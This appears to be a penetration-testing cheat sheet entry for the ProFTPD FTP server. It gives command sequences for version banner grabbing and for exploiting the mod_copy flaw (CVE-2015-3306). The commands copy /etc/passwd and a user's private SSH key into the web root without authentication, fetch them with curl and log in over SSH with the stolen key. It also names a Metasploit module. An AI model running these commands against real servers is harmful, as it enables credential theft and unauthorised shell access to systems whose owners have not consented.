ProFTPD

What it is: Popular open-source FTP server for Unix/Linux. The mod_copy module (enabled by default) allows unauthenticated file copying on the server, which is a common exploit path.

Default ports: 21

Vuln research:


Check ProFTPD version

Banner grab reveals version — Determines exploit path

nc -nv $IP 21
nmap -sV -p 21 $IP
Example Output
220 ProFTPD 1.3.5 Server ready.

ProFTPD mod_copy (CVE-2015-3306)

Copy files on the server without authentication — ProFTPD 1.3.5

nc $IP 21
SITE CPFR /etc/passwd
350 File or directory exists, ready for destination name
SITE CPTO /var/www/html/passwd.txt
250 Copy successful
curl http://$IP/passwd.txt

Copy SSH key for access

Use mod_copy to steal or plant SSH keys — Instant shell access

nc $IP 21
SITE CPFR /home/user/.ssh/id_rsa
SITE CPTO /var/www/html/id_rsa
curl http://$IP/id_rsa -o id_rsa
chmod 600 id_rsa
ssh -i id_rsa user@$IP

ProFTPD RCE (CVE-2019-12815)

mod_copy in ProFTPD up to 1.3.5b — Arbitrary file copy

searchsploit proftpd
# Use exploit/unix/ftp/proftpd_modcopy_exec in Metasploit